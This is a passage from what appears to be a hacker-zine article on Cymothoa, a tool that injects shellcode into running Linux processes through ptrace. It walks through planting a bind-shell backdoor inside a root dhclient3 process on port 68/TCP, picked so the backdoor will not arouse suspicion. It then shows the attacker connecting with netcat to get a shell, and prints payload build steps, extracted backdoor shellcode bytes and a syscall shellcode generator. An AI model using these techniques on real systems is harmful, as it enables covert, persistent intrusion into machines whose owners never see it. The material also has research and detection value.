5) Bind socket to the specified port.
6) Socket in listen mode with listen().
7) Check if a client is connected using accept().
7.1) No clients, jump to 9
7.2) Client connected, continue
8) Fork() a child process and execute a shell.
9) Set the timer and resume host execution
(the second half of the preamble)
For this shellcode the provided arguments are a persistent memory
address, the port to listen on and the timer (in seconds).
Finally, let's see a practical example of use.
First, we must identify our host process. We need also to find a door is
not likely to arouse suspicion.
root@victim# lsof -a -i -c dhclient3
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
good strategy for our backdoor is to listen on port 68/TCP...
root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
[+] attaching to process 1612
register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0x6
esp value: 0xbfff6dd0 eip value: 0xb7682430
------------------------------------------------------------
[+] new esp: 0xbfff6dcc
[+] injecting code into 0xb7683000
[+] copy general purpose registers
[+] persistent memory at 0xb769f000 (if used)
[+] detaching from 1612
[+] infected!!!
Let's see the result:
root@victim# lsof -a -i -c dhclient3
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
dhclient3 1612 root 7u IPv4 21892 0t0 TCP *:bootpc (LISTEN)
As you can see it is very difficult to see that something is wrong...
Now the attacker can connect to the victim and get a shell:
root@attacker# nc -vv victim_ip 68
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
We have achieved our goal: a single process backdoor :)
------[ 6. Something about the injector
In all these examples we always used the injector cymothoa [3].
Some notes about this tool...
The injector is very important because it allows the customization of the
shellcode and its injection in the right areas of memory.
Cymothoa wants to be an aid to developing shellcode, in several ways.
In the payloads directory there are all the assembly sources created by the
author, easily compilable with gcc:
root@box# cd payloads
root@box# ls
clone_shellcode.s fork_shellcode.s
scheduled_backdoor_alarm.s mmx_example_shellcode.s
scheduled_setitimer.s scheduled_alarm.s
scheduled_tail_setitimer.s
root@box# gcc -c scheduled_backdoor_alarm.s
root@box#
Cymothoa includes also some tools to easily extract the shellcode from
these object files.
For example bgrep [6], a binary grep, that allows to find the offset of
of particular hexadecimal sequences:
root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
payloads/scheduled_backdoor_alarm.o: 0000014b
This is useful for finding the beginning of the code to extract.
Once you locate the beginning and the length of the code, you can easily
turn it into a C string with the script hexdump_to_cstring.pl.
root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
./hexdump_to_cstring.pl
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
...
Once this is done you can add this string to the file payloads.h, and
recompile cymothoa, to have a new, ready to inject, parasite.
If you want to transform into parasite code you already have available,
that's the easy way.
The last thing I want to mention about cymothoa, is a little utility
shipped with the main tool: a syscall code generator.
Writing syscall based shellcodes can be a tedious work, especially if
you must remember every syscall number and parameters.
Since I am a lazy person, I've written a script able to do part of
the hard work:
root@box# ./syscall_code.pl
Syscall shellcode generator
Usage:
./syscall_code.pl syscall
For example you can use it to generate the calling sequence for the
open syscall:
root@box# ./syscall_code.pl sys_open
sys_open_call:
# call to sys_open(filename, flags, mode)
xorl %eax, %eax
mov $5, %al
xorl %ebx, %ebx
mov filename, %bl
xorl %ecx, %ecx
mov flags, %cl
xorl %edx, %edx
mov mode, %dl
int $0x80
As you can see the script generates assembly code that marks arguments and
corresponding registers of the syscall, as well as the call number.
The code is not always 100% reliable (e.g. some syscalls require complex
structures the script is not able to construct), but it can greatly speed
up the shellcode development phase.
I hope you'll find it useful...
------[ 7. Further reading
While I was writing this article, on the defcon's website have been
published the talks which will take place during the next edition.
One of these caught my attention [7]:
Jugaad - Linux Thread Injection Kit
"... The kit currently works on Linux, allocates space inside
a process and injects and executes arbitrary payload as a
thread into that process. It utilizes the ptrace() functionality
to manipulate other processes on the system. ptrace() is an API
generally used by debuggers to manipulate(debug) a program.
By using the same functionality to inject and manipulate the
flow of execution of a program Jugaad is able to inject the
payload as a thread."
I recommend all readers who have judged this article interesting, to follow
this talk, because it is a similar research, but parallel to mine.
My goal was to implement a stealth backdoor without creating new processes
or threads, while the research of Aseem focuses on the creation of threads,
to achieve the same level of stealthiness.
I therefore offer my best wishes to Aseem, since I think our works are
complementary.
For additional material on "injection of code" you can see the links
listed at the end of the document.
Bye bye ppl ;)
Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
sugar, renaud, bt_smarto, cris.
------[ 8. Links and references
[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
(5 - The dynamic linker's dl-resolve() function)
[3] http://vxheavens.com/lib/vrn00.html#c42
[4] http://cymothoa.sourceforge.net/
[5] http://www.exploit-db.com/exploits/13388/
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar
------[ EOF